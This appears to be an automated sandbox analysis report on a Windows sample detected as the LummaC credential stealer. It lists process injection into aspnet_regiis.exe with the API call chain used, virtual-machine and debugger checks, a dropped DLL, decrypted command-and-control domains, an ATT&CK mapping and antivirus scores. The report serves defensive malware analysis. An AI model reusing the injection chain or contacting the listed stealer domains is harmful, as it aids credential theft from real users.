Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: SoftWare(1).exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SoftWare(1).exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\SoftWare(1).exe

Unpacked PE file: 0.2.SoftWare(1).exe.dd0000.0.unpack 'H{_AE:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: SoftWare(1).exe	Static PE information: section name: 'H{_AE
Source: SoftWare(1).exe	Static PE information: section name:

Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_00E1C9EE pushad ; ret	0_2_00E1C9EF
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_00E1C6C8 push esi; ret	0_2_00E1C6D8
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_00E20F38 push ss; ret	0_2_00E20F58
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF6C0B1 push ecx; ret	0_2_6CF6C0C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_005692E2 push esp; retf	2_2_005692E5

Source: SoftWare(1).exe

Static PE information: section name: 'H{_AE entropy: 7.999398017019204

Source: C:\Users\user\Desktop\SoftWare(1).exe

File created: C:\Users\user\AppData\Roaming\msvcp110.dll

Jump to dropped file

Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory allocated: 2F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory allocated: 30D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory allocated: 50D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory allocated: 5740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory allocated: 6740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory allocated: 6870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory allocated: 7870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory allocated: 7C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory allocated: 8C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory allocated: 9C00000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dll

Jump to dropped file

Source: C:\Users\user\Desktop\SoftWare(1).exe TID: 2000	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 2892	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\SoftWare(1).exe

Code function: 0_2_6CF6556D FindFirstFileExW,

0_2_6CF6556D

Source: C:\Users\user\Desktop\SoftWare(1).exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, 00000002.00000002.1972630357.000000000292C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1972630357.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

API call chain: ExitProcess graph end node

graph_2-15511

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_005907F0 LdrInitializeThunk,

2_2_005907F0

Source: C:\Users\user\Desktop\SoftWare(1).exe

Code function: 0_2_6CF5F682 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CF5F682

Source: C:\Users\user\Desktop\SoftWare(1).exe

Code function: 0_2_6CF66C90 GetProcessHeap,

0_2_6CF66C90

Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF5F157 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CF5F157
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF5F682 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CF5F682
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF6361C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CF6361C

Source: C:\Users\user\Desktop\SoftWare(1).exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SoftWare(1).exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 550000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SoftWare(1).exe

Code function: 0_2_6CF4C4F0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,

0_2_6CF4C4F0

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\SoftWare(1).exe

0_2_6CF4C4F0

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SoftWare(1).exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 550000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: drawwyobstacw.sbs
Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: condifendteu.sbs
Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: ehticsprocw.sbs
Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: vennurviot.sbs
Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: resinedyw.sbs
Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: enlargkiw.sbs
Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: allocatinow.sbs
Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: mathcucom.sbs
Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: passimovrt.cfd

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 550000	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 551000	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 595000	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 598000	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 5A8000	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 272A008	Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe

Code function: 0_2_6CF5F848 cpuid

0_2_6CF5F848

Source: C:\Users\user\Desktop\SoftWare(1).exe	Queries volume information: C:\Users\user\Desktop\SoftWare(1).exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe

Code function: 0_2_6CF5F2CB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CF5F2CB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	511 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	41 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	511 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	33 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SoftWare(1).exe	21%	ReversingLabs	Win32.Trojan.SpywareX
SoftWare(1).exe	33%	Virustotal		Browse
SoftWare(1).exe	100%	Avira	HEUR/AGEN.1352236
SoftWare(1).exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\msvcp110.dll	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
condifendteu.sbs	18%	Virustotal	Browse
steamcommunity.com	0%	Virustotal	Browse
vennurviot.sbs	18%	Virustotal	Browse
drawwyobstacw.sbs	18%	Virustotal	Browse
mathcucom.sbs	21%	Virustotal	Browse
sergei-esenin.com	18%	Virustotal	Browse
resinedyw.sbs	18%	Virustotal	Browse
passimovrt.cfd	0%	Virustotal	Browse
enlargkiw.sbs	18%	Virustotal	Browse
ehticsprocw.sbs	16%	Virustotal	Browse
allocatinow.sbs	20%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
